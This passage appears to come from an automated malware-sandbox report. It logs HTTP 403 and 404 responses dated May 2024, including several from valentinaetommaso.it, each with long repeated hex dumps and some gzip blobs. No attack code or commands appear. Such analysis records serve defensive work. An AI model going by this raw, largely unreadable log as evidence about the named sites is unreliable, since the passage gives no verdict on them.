77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:34:55 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:34:58 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:35:01 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:35:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=gbiispvjbljgmcrojhkjce820d; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:35:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=smvvp80sjvd506bou7008ikb7a; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:35:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=d8iv0urgag0t0cnh4jbltmrciv; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:35:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=41lb3dcni2jqh97afn7lsn75l2; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:35:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:35:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:35:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data 